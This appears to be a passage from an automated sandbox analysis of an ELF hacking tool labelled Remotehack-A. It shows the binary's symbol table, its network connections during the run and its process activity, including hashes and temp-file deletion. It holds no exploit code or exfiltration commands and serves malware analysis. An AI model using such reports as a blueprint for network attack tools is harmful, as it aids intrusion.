atoi@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
close@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
completed.6362 | .symtab | 0x6050d0 | 1 | OBJECT | <unknown> | DEFAULT | 26 | ||
connect@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
crtstuff.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
data_start | .symtab | 0x6050c0 | 0 | NOTYPE | <unknown> | DEFAULT | 25 | ||
deregister_tm_clones | .symtab | 0x400a60 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
elf-init.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
enumprinters.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
exit@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
frame_dummy | .symtab | 0x400af0 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
free@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
frontend.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
functions.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
gethostbyname@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
hextoint | .symtab | 0x402411 | 619 | FUNC | <unknown> | DEFAULT | 14 | ||
htons@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
inet_addr@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
init.c | .symtab | 0x0 | 0 | FILE | <unknown> | DEFAULT | SHN_ABS | ||
main | .symtab | 0x400b20 | 159 | FUNC | <unknown> | DEFAULT | 14 | ||
memcpy@@GLIBC_2.14 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
memset@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
my | .symtab | 0x6050e0 | 8 | OBJECT | <unknown> | DEFAULT | 26 | ||
puts@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
recv@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
register_tm_clones | .symtab | 0x400a90 | 0 | FUNC | <unknown> | DEFAULT | 14 | ||
send@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
shutdown@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
sm | .symtab | 0x6050d8 | 4 | OBJECT | <unknown> | DEFAULT | 26 | ||
socket@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
strcpy@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
strdup@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
strlen@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF | ||
usage | .symtab | 0x400bbf | 34 | FUNC | <unknown> | DEFAULT | 14 | ||
usleep@@GLIBC_2.2.5 | .symtab | 0x0 | 0 | FUNC | <unknown> | DEFAULT | SHN_UNDEF |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
May 28, 2024 06:39:51.834810019 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 28, 2024 06:39:52.498630047 CEST | 443 | 33606 | 54.171.230.55 | 192.168.2.23 |
May 28, 2024 06:39:52.498972893 CEST | 33606 | 443 | 192.168.2.23 | 54.171.230.55 |
May 28, 2024 06:39:52.503923893 CEST | 443 | 33606 | 54.171.230.55 | 192.168.2.23 |
May 28, 2024 06:39:55.162437916 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
May 28, 2024 06:39:57.466089964 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
May 28, 2024 06:40:12.823954105 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 28, 2024 06:40:23.062818050 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
May 28, 2024 06:40:25.110253096 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
May 28, 2024 06:40:53.778462887 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
May 28, 2024 06:41:14.255650997 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
System Behavior
Start time (UTC): | 04:39:50 |
Start date (UTC): | 28/05/2024 |
Path: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
Arguments: | /tmp/SecuriteInfo.com.ELF.Remotehack-A.30964.4562.elf |
File size: | 31124 bytes |
MD5 hash: | 9c4a6db5821b4a390b09223e5047cce7 |
Start time (UTC): | 04:39:51 |
Start date (UTC): | 28/05/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:39:51 |
Start date (UTC): | 28/05/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
Start time (UTC): | 04:39:51 |
Start date (UTC): | 28/05/2024 |
Path: | /usr/bin/dash |
Arguments: | - |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
Start time (UTC): | 04:39:51 |
Start date (UTC): | 28/05/2024 |
Path: | /usr/bin/rm |
Arguments: | rm -f /tmp/tmp.XIacViEATy /tmp/tmp.ZJrYcTpmyu /tmp/tmp.Ack5AbPZ3M |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |